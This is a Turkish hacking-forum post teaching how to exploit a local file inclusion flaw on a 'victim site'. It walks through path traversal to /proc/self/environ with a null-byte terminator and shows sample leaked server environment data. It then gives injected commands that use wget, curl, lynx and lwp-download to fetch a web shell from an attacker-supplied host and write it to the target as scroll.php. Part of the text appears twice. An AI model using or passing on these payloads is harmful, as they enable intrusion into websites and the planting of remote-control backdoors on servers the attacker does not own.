- 19 May 2013
- 42
- 0
Öncelikle Selamun aleyküm // Morris
Kurban sitemizdeki lfi açığı şu şekilde olsun: http://www.BlaBla.com//index.php?action=2
2yi siliyoruz.
../../../../../../../../../../../../../../../proc/self/environ%00
Eşittirden sonra yukarıdaki lfi komutumuzu uyguluyoruz.
Şu şekilde olucaktır ;
http://www.BlaBla.com//index.php?ac...../../../../../../../../../proc/self/environ
Bu adresi browser'a uyguladıktan sonra karşınıza şöyle bir veri çıkıcaktır..
Bu yazıyı gördüyseniz , shell sokabilirsiniz demektir..
Şu şekilde shell upload edebilirsiniz ;
Dipnot :
Shell upload olucaktır , shellinizinadresi.com/tools/bd/fxshell.txt kısmını editleyebilirsiniz.
örnek sizin söyle olabilir http://www.morrisflex.com.nu/morshell.txt
gibi...
Kurban sitemizdeki lfi açığı şu şekilde olsun: http://www.BlaBla.com//index.php?action=2
2yi siliyoruz.
../../../../../../../../../../../../../../../proc/self/environ%00
Eşittirden sonra yukarıdaki lfi komutumuzu uyguluyoruz.
Şu şekilde olucaktır ;
http://www.BlaBla.com//index.php?ac...../../../../../../../../../proc/self/environ
Bu adresi browser'a uyguladıktan sonra karşınıza şöyle bir veri çıkıcaktır..
Kod:
[COLOR="Red"][B]Warning: system() [function.system]: Cannot execute a blank command in /proc/20085/environ on line 1
PATH=/bin:/usr/bin?QUERY_STRING=action=../../../../../../../../../../../../../../../proc/self/environ%00?REDIRECT_STATUS=200?REMOTE_ADDR=222.124.156.231?REMOTE_PORT=3420?REQUEST_METHOD=GET?REQUEST_URI=//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00?SCRIPT_FILENAME=/home/blabla/public_html/zzz/index.php?SCRIPT_NAME=/index.php?SERVER_ADDR=174.132.115.6?SERVER_ADMIN=webmaster@blabla.com?SERVER_NAME=blabla.com?SERVER_PORT=80?SERVER_PROTOCOL=HTTP/1.1?SERVER_SIGNATURE=
Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at blabla.com Port 80
SERVER_SOFTWARE=Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635?UNIQUE_ID=S@eCPK6EcwIAAAiIu9gAAAOD?[/B][/COLOR]
Bu yazıyı gördüyseniz , shell sokabilirsiniz demektir..
Şu şekilde shell upload edebilirsiniz ;
Kod:
http://www.blabla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00&cmd=wget http://shelinizinadresi.com/tools/bd/fxshell.txt -O scroll.php
Kod:
http://www.blabla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00&cmd=curl http://shelinizinadresi.com/tools/bd/fxshell.txt -o scroll.php
Kod:
http://www.blabla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00&cmd=lynx http://shelinizinadresi.com/tools/bd/fxshell.txt -o scroll.php
Kod:
http://www.blabla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00&cmd=lwp-download http://shelinizinadresi.com/tools/bd/fxshell.txt -o scroll.php
Dipnot :
Shell upload olucaktır , shellinizinadresi.com/tools/bd/fxshell.txt kısmını editleyebilirsiniz.
örnek sizin söyle olabilir http://www.morrisflex.com.nu/morshell.txt
gibi...
Son düzenleme: